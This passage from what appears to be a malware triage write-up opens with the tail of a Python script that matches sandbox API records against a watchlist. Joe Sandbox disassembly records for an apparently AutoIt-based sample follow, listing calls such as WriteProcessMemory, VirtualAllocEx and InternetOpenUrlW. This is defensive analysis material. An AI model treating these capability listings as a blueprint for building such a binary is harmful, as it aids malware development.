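            hits.append((idx, rec.meta.get("Instruction Fuzzy Hash", ""), matched))
    return hits


def jaccard(a: set[str], b: set[str]) -> float:
    """Set similarity of two records' direct API sets (1.0 for two empty sets)."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for idx, fhash, apis in triage(recs):
        print(f"record {idx} {fhash[:16]}...: " + ", ".join(f"{a} ({WATCHLIST[a]})" for a in apis))
    print("API-set similarity of the two records:", jaccard(recs[0].direct_apis(), recs[1].direct_apis()))
```

Running the script against a full report is a matter of feeding the saved page text to parse_records; the same regexes handle the two-space-indented subcall lines, the comma-less "ref:" form used for LIBCMT calls, and empty Similarity fields such as the blank String ID above. Only direct calls feed the watchlist, because a subcall entry attributes the API to the callee, which gets its own record.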
                                        APIs
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction ID: 6996db40843dfbc72454f35b21605783cba26b4aca11d28bd110eb5f812ef183
                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction Fuzzy Hash: F1510F70914625AACF13AF98E4C19BDB3B4FF04711F51904AF581AB292DBB45F82DB90
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00362AF6
                                        • VariantClear.OLEAUT32(00000013), ref: 00362B68
                                        • VariantClear.OLEAUT32(00000000), ref: 00362BC3
                                        • _memmove.LIBCMT ref: 00362BED
                                        • VariantClear.OLEAUT32(?), ref: 00362C3A
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00362C68
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        • API String ID: 1101466143-0
                                        • Opcode ID: 450d1e194a520cee3f751fd59754d6334d237b9e67181f04b1995e0a3ab8b6d1
                                        • Instruction ID: ee302b908c615c57f78a72149e5175bf4468df04d64937b1141d422d461131f4
                                        • Opcode Fuzzy Hash: 450d1e194a520cee3f751fd59754d6334d237b9e67181f04b1995e0a3ab8b6d1
                                        • Instruction Fuzzy Hash: FB5166B5A00609EFCB15CF58C880AAAB7B8FF4C314B168559E959DB314E730E951CFA0
                                        APIs
                                        • GetMenu.USER32(?), ref: 0038833D
                                        • GetMenuItemCount.USER32(00000000), ref: 00388374
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0038839C
                                        • GetMenuItemID.USER32(?,?), ref: 0038840B
                                        • GetSubMenu.USER32(?,?), ref: 00388419
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0038846A
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        • API String ID: 650687236-0
                                        • Opcode ID: 2a40bdfff85382287669aacd5e92677a04f9680dece1231a4cbb176931d217af
                                        • Instruction ID: 475a78a9adaa2d11864893ab56fb36c4e78ca8b0c6f90a7cbc09798948775fad
                                        • Opcode Fuzzy Hash: 2a40bdfff85382287669aacd5e92677a04f9680dece1231a4cbb176931d217af
                                        • Instruction Fuzzy Hash: 5E51A136E00215EFCB02EF65C941AAEB7F4EF49710F518499F811BB351DB70AE418B90
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00379409
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379416
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0037943A
                                        • _strlen.LIBCMT ref: 00379484
                                        • _memmove.LIBCMT ref: 003794CA
                                        • WSAGetLastError.WS2_32(00000000), ref: 003794F7
                                        Similarity
                                        • API ID: ErrorLast$_memmove_strlenselect
                                        • String ID:
                                        • API String ID: 2795762555-0
                                        • Opcode ID: f426b8014650a439ad2f454292a46b08e33785f2ca04ac91127d7d6a2a8b69d7
                                        • Instruction ID: 6c773632492db2be2a629b925184fbef587a753a4e0966950f120f464b2b8221
                                        • Opcode Fuzzy Hash: f426b8014650a439ad2f454292a46b08e33785f2ca04ac91127d7d6a2a8b69d7
                                        • Instruction Fuzzy Hash: E9416075600114AFCB16EF65DD85FAEB7BDEF48310F10826AF51A9B291DB34AE01CB60
                                        APIs
                                        • _memset.LIBCMT ref: 0036552E
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00365579
                                        • IsMenu.USER32(00000000), ref: 00365599
                                        • CreatePopupMenu.USER32 ref: 003655CD
                                        • GetMenuItemCount.USER32(000000FF), ref: 0036562B
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0036565C
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: c73f7884c7edee673282b206676d4bf5f12677f4d033943b555cd995d5e5cb76
                                        • Instruction ID: 6e7e510ce14469123d9c35a85bbfdd4da3234adbda4bb1a47656eb5d899c1a89
                                        • Opcode Fuzzy Hash: c73f7884c7edee673282b206676d4bf5f12677f4d033943b555cd995d5e5cb76
                                        • Instruction Fuzzy Hash: 1A51D470600A45EFDF22CF68C88CBADBBF9AF56318F54C139E4569B298D3B09944CB51
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0033B1C1
                                        • GetWindowRect.USER32(?,?), ref: 0033B225
                                        • ScreenToClient.USER32(?,?), ref: 0033B242
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0033B253
                                        • EndPaint.USER32(?,?), ref: 0033B29D
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        • API String ID: 1827037458-0
                                        • Opcode ID: 6774374b97715a46316310c26bfb59fca1e213b9a60241511e80f8762d9c5cf7
                                        • Instruction ID: f0801d9ebb9e8dadfdd23a72483cd0b3602a641b530950a053f281a8602e3da7
                                        • Opcode Fuzzy Hash: 6774374b97715a46316310c26bfb59fca1e213b9a60241511e80f8762d9c5cf7
                                        • Instruction Fuzzy Hash: E2417E715042409FDB22DF24DCC4BBABBECEB46320F140669FAA5CB2A1C7319845DB62
                                        APIs
                                          • Part of subcall function 0033B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                          • Part of subcall function 0033B58B: BeginPath.GDI32(?), ref: 0033B611
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0038E9F2
                                        • LineTo.GDI32(00000000,00000003,?), ref: 0038EA06
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0038EA14
                                        • LineTo.GDI32(00000000,00000000,?), ref: 0038EA24
                                        • EndPath.GDI32(00000000), ref: 0038EA34
                                        • StrokePath.GDI32(00000000), ref: 0038EA44
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 4bb43e23e89a22bcc483e14f6ba074f60ff3a5414dcc0ee25a86cfe3b872be5b
                                        • Instruction ID: 5542bccfce39604748c7b938c11a207d187917ade423a66827e998392d236401
                                        • Opcode Fuzzy Hash: 4bb43e23e89a22bcc483e14f6ba074f60ff3a5414dcc0ee25a86cfe3b872be5b
                                        • Instruction Fuzzy Hash: DE11097600014DBFEF129F90DC88E9A7FADEB09354F048011FA1A49160D7719E55DBA0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0035EFB6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0035EFC7
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0035EFCE
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0035EFD6
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0035EFED
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0035EFFF
                                          • Part of subcall function 0035A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0035A79D,00000000,00000000,?,0035AB73), ref: 0035B2CA
                                        Similarity
                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                        • String ID:
                                        • API String ID: 603618608-0
                                        • Opcode ID: f725962f52f9d4e9ef99da9bca9c9987df4485ea07b7289298bd699bd6a13330
                                        • Instruction ID: 24208af95c8ef5f24eeed347d06be6d06915e73437908c5780a0847bb047a36d
                                        • Opcode Fuzzy Hash: f725962f52f9d4e9ef99da9bca9c9987df4485ea07b7289298bd699bd6a13330
                                        • Instruction Fuzzy Hash: F201A7B5A00305BFEB119BA59C45F5EBFBCEB49751F054066FE05AB290D6709D00CF61
                                        APIs
                                        • __init_pointers.LIBCMT ref: 003487D7
                                          • Part of subcall function 00341E5A: __initp_misc_winsig.LIBCMT ref: 00341E7E
                                          • Part of subcall function 00341E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00348BE1
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00348BF5
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00348C08
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00348C1B
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00348C2E
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00348C41
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00348C54
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00348C67
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00348C7A
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00348C8D
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00348CA0
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00348CB3
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00348CC6
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00348CD9
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00348CEC
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00348CFF
                                        • __mtinitlocks.LIBCMT ref: 003487DC
                                          • Part of subcall function 00348AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(003DAC68,00000FA0,?,?,003487E1,00346AFA,003D67D8,00000014), ref: 00348AD1
                                        • __mtterm.LIBCMT ref: 003487E5
                                          • Part of subcall function 0034884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 003489CF
                                          • Part of subcall function 0034884D: _free.LIBCMT ref: 003489D6
                                          • Part of subcall function 0034884D: RtlDeleteCriticalSection.NTDLL(003DAC68), ref: 003489F8
                                        • __calloc_crt.LIBCMT ref: 0034880A
                                        • GetCurrentThreadId.KERNEL32 ref: 00348833
                                        Similarity
                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 2942034483-0
                                        • Opcode ID: 6a516d75efda10b16c72710ac73fc3e9d2c640d8b265a7e1066808e1ac7f0941
                                        • Instruction ID: fa4283bd86b2ecde7fca2d832d6daf6eadaec7b606781ff16b46e67814a90092
                                        • Opcode Fuzzy Hash: 6a516d75efda10b16c72710ac73fc3e9d2c640d8b265a7e1066808e1ac7f0941
                                        • Instruction Fuzzy Hash: 1CF0B43311AB515AE26777787C0769E2AC4CF02B34F610A2AF464DD0D2FF50B8414150
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 1423608774-0
                                        • Opcode ID: f916dd32d678710732f7cb1a4bf48ef9f9b0f32c93d98cba2f0625b59c91a2b9
                                        • Instruction ID: da376fc66ed4a05a4c05f321353b45e082f803f1a7509e561cba7a13c30fe0b8
                                        • Opcode Fuzzy Hash: f916dd32d678710732f7cb1a4bf48ef9f9b0f32c93d98cba2f0625b59c91a2b9
                                        • Instruction Fuzzy Hash: 1B01F436101611EBD7172B54EC48EEB7BADFF8A702F114529F503A69A5CB74AC00CF61
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00321898
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 003218A0
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003218AB
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003218B6
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 003218BE
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003218C6
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: 99f5e4ece7a03d6c3e5e7f99eb2d3c35d1c1a042d19cc3020e7723d575f69cbb
                                        • Instruction ID: 22d2346623e5dc092c2c8b866005e223b26ab80f63343ad826a118bf5b021130
                                        • Opcode Fuzzy Hash: 99f5e4ece7a03d6c3e5e7f99eb2d3c35d1c1a042d19cc3020e7723d575f69cbb
                                        • Instruction Fuzzy Hash: B40167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00368504
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0036851A
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00368529
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368538
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368542
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368549
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 6efda04d60f71da55f87f38d7f899d2ed09892ee0657eb3e9d0a14042a09589e
                                        • Instruction ID: d42a72449877f7eaace689305477ca9ceb857d122924e02c74f319f8366d6ce7
                                        • Opcode Fuzzy Hash: 6efda04d60f71da55f87f38d7f899d2ed09892ee0657eb3e9d0a14042a09589e
                                        • Instruction Fuzzy Hash: 8BF05E72240158BBE7225B629D0EEEF7F7CDFCBB15F000159FA06D1061EBA06A01C6B5
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 0036A330
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0036A341
                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 0036A34E
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 0036A35B
                                          • Part of subcall function 00369CCE: CloseHandle.KERNEL32(?,?,0036A368,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 00369CD8
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0036A36E
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0036A375
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: a0e110deeece13ca884857f3dbc93b507564d03f5ef033dc21d8752cdca411be
                                        • Instruction ID: d6a5248818caa74d3cae374d015d484df0b77b02a68b336dd79adaf0099f96f1
                                        • Opcode Fuzzy Hash: a0e110deeece13ca884857f3dbc93b507564d03f5ef033dc21d8752cdca411be
                                        • Instruction Fuzzy Hash: 5BF0E236140201ABD3132B64EC4CEDB7B7DFF8A302F000821F203A58A5CBB89800CF50
                                        APIs
                                        • _memmove.LIBCMT ref: 0032C419
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00366653,?,?,00000000), ref: 0032C495
                                        Similarity
                                        • API ID: FileRead_memmove
                                        • String ID: Sf6
                                        • API String ID: 1325644223-1839599683
                                        • Opcode ID: 7a2b5c10e6e994cd32d1f1cccab5bb758cdc92955fba767b2835c9799c9c8e25
                                        • Instruction ID: e79eb6c5d3a90eb27066880e30b11075825a845e8aa522a88d8c3ff0a2ea4756
                                        • Opcode Fuzzy Hash: 7a2b5c10e6e994cd32d1f1cccab5bb758cdc92955fba767b2835c9799c9c8e25
                                        • Instruction Fuzzy Hash: C3A1EF30A04629EBDF02DF66E880BAEFBB4FF05300F14C595E8659B681D735E961CB91
                                        APIs
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 0032BBD9: _memmove.LIBCMT ref: 0032BC33
                                        • __swprintf.LIBCMT ref: 0033D98F
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0033D832
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: a379e83cd3f404bd6eae28f1eeb84aecf270c634a6d6ad776783dce8da2f7ae2
                                        • Instruction ID: b80af39c73365e554eef218fab25945e6001cda5e4738f8d8e91b7bee2320e02
                                        • Opcode Fuzzy Hash: a379e83cd3f404bd6eae28f1eeb84aecf270c634a6d6ad776783dce8da2f7ae2
                                        • Instruction Fuzzy Hash: E3914B311183119FCB16EF24E886D6EB7A8FF99700F01495DF5969B2A1EB30EE04CB52
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0037B4A8
                                        • CharUpperBuffW.USER32(?,?), ref: 0037B5B7
                                        • VariantClear.OLEAUT32(?), ref: 0037B73A
                                          • Part of subcall function 0036A6F6: VariantInit.OLEAUT32(00000000), ref: 0036A736
                                          • Part of subcall function 0036A6F6: VariantCopy.OLEAUT32(?,?), ref: 0036A73F
                                          • Part of subcall function 0036A6F6: VariantClear.OLEAUT32(?), ref: 0036A74B
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        • Opcode ID: e6799fa4ed6b945a50a209e7754b45ee8e99a0da235fcb493098789981c08f2c
                                        • Instruction ID: 5257bcc0fcf60c674ed83c2dc260e0e6aeac5e36f9d66394d5538c752a5ccb88
                                        • Opcode Fuzzy Hash: e6799fa4ed6b945a50a209e7754b45ee8e99a0da235fcb493098789981c08f2c
                                        • Instruction Fuzzy Hash: AF919E746043019FCB11DF24C485A5ABBF8EFC9710F14882DF88A9B352DB35E945CB52
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 0038C354
                                        • ScreenToClient.USER32(?,00000002), ref: 0038C384
                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0038C3EA
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID: @U=u
                                        • API String ID: 3880355969-2594219639
                                        • Opcode ID: d330763eab0f1f87f129a135d16b1c6256953aefefc3b276c8b91d114f15dc9d
                                        • Instruction ID: 92fc3f95bad0405ee5da43dd3122a6a068c4c2679cd0c4a226b0843f73212a75
                                        • Opcode Fuzzy Hash: d330763eab0f1f87f129a135d16b1c6256953aefefc3b276c8b91d114f15dc9d
                                        • Instruction Fuzzy Hash: E9518135910204EFCF22EF68C880AAE7BB5FF45320F119199F9159B291D770DD81CBA0
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D258
                                        • __itow.LIBCMT ref: 0035D292
                                          • Part of subcall function 0035D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0035D549
                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0035D2FB
                                        • __itow.LIBCMT ref: 0035D350
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID: @U=u
                                        • API String ID: 3379773720-2594219639
                                        • Opcode ID: 3fb9f843f7fee5b45215499fd0423810b5752076f2c90f248fd5ce615b03a499
                                        • Instruction ID: b8c939d0d6b5fe179c0586f57705b8daa065779d6caf54ad1f9d0b2206c7ca55
                                        • Opcode Fuzzy Hash: 3fb9f843f7fee5b45215499fd0423810b5752076f2c90f248fd5ce615b03a499
                                        • Instruction Fuzzy Hash: BD41A775A003196BDF23DF54D852FEE7BB9AF49701F000015FA05AB2A1DB749A49CB52
                                        APIs
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0035CFC9
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                          • Part of subcall function 00364C65: GetWindowThreadProcessId.USER32(?,?), ref: 00364C90
                                          • Part of subcall function 00364C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CA0
                                          • Part of subcall function 00364C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CB6
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0035D036
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0035D083
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @$@U=u
                                        • API String ID: 4150878124-826235744
                                        • Opcode ID: 5db71ad44a075a6e95268adf0bd996351c96b2d327d245c1c0650bb795622c9a
                                        • Instruction ID: a793db9a12f9fe0e5b1df916c247e11865244823818d8734f565193b1b335840
                                        • Opcode Fuzzy Hash: 5db71ad44a075a6e95268adf0bd996351c96b2d327d245c1c0650bb795622c9a
                                        • Instruction Fuzzy Hash: B2412D72D00218BEDB11DF94CC85EDEBB78AF45700F108095EA45BB191DA706E49CB61
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003610B8
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003610EE
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003610FF
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00361181
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: dde41f8053fa5fc8de6a147062d34897ab134f140b90017dcee2d850d049e1b9
                                        • Instruction ID: 6bfdcdf5aae48d17081f33bcf850fbd2796e048b9f73db83101485d437be089f
                                        • Opcode Fuzzy Hash: dde41f8053fa5fc8de6a147062d34897ab134f140b90017dcee2d850d049e1b9
                                        • Instruction Fuzzy Hash: 5B414D71600204AFDB56CF54C884A9A7BA9EF46350F19C4A9EA06DF209D7B5D944CBA0
                                        APIs
                                        • _memset.LIBCMT ref: 00365A93
                                        • GetMenuItemInfoW.USER32 ref: 00365AAF
                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00365AF5
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E18F0,00000000), ref: 00365B3E
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: 6c659dcd290132bd6b274f5bfecda01d9f5a710ee1e4cb4734e6427ebfbdae81
                                        • Instruction ID: ad5dc27669a374bdfad9be1f84a5e68fe8e3da7adb3a5c6372cca5b0c1d6596c
                                        • Opcode Fuzzy Hash: 6c659dcd290132bd6b274f5bfecda01d9f5a710ee1e4cb4734e6427ebfbdae81
                                        • Instruction Fuzzy Hash: 6D41A071204701AFDB22DF24C884B6AB7E8EF89314F05862DF9A59B2D5D770E800CB66
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0038B3E1
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID: @U=u
                                        • API String ID: 634782764-2594219639
                                        • Opcode ID: ba8f8da73e9f27926403c1f43fddde7604414de84da290336e300c0cde467e22
                                        • Instruction ID: 6974690beec14174a63598844bd7f13d03ef0dafb8215b44a7f4ca2b2bc99115
                                        • Opcode Fuzzy Hash: ba8f8da73e9f27926403c1f43fddde7604414de84da290336e300c0cde467e22
                                        • Instruction Fuzzy Hash: 4131D234600306FBEF37AF19CC86BA8B768EB06350F558192FA52DB5E2C770E9419B51
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00380478
                                          • Part of subcall function 00327F40: _memmove.LIBCMT ref: 00327F8F
                                          • Part of subcall function 0032A2FB: _memmove.LIBCMT ref: 0032A33D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 2411302734-567219261
                                        • Opcode ID: c73d800e3d92c06f267a1b2211c9b8e95552c392e4443cb26c21d14b50c597f1
                                        • Instruction ID: 184c0229e5af6d77f50ed658d5075c29b7ace0d9751dec0c22e17eb3092085e7
                                        • Opcode Fuzzy Hash: c73d800e3d92c06f267a1b2211c9b8e95552c392e4443cb26c21d14b50c597f1
                                        • Instruction Fuzzy Hash: 2731E735904619AFCF0AEF58D8409EEB3B5FF05310F10866AE4669B2D1DB31E905CF50
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00374A60
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00374A86
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00374AB6
                                        • InternetCloseHandle.WININET(00000000), ref: 00374AFD
                                          • Part of subcall function 003756A9: GetLastError.KERNEL32(?,?,00374A2B,00000000,00000000,00000001), ref: 003756BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 1951874230-3916222277
                                        • Opcode ID: a28630a5ebb96220e6fccecb5004986d9f4962d01b2e6767b227313795c75e50
                                        • Instruction ID: 38aa0bf74ba028501c2b9d1060850228196afdec9cfe94dc010a27f847425903
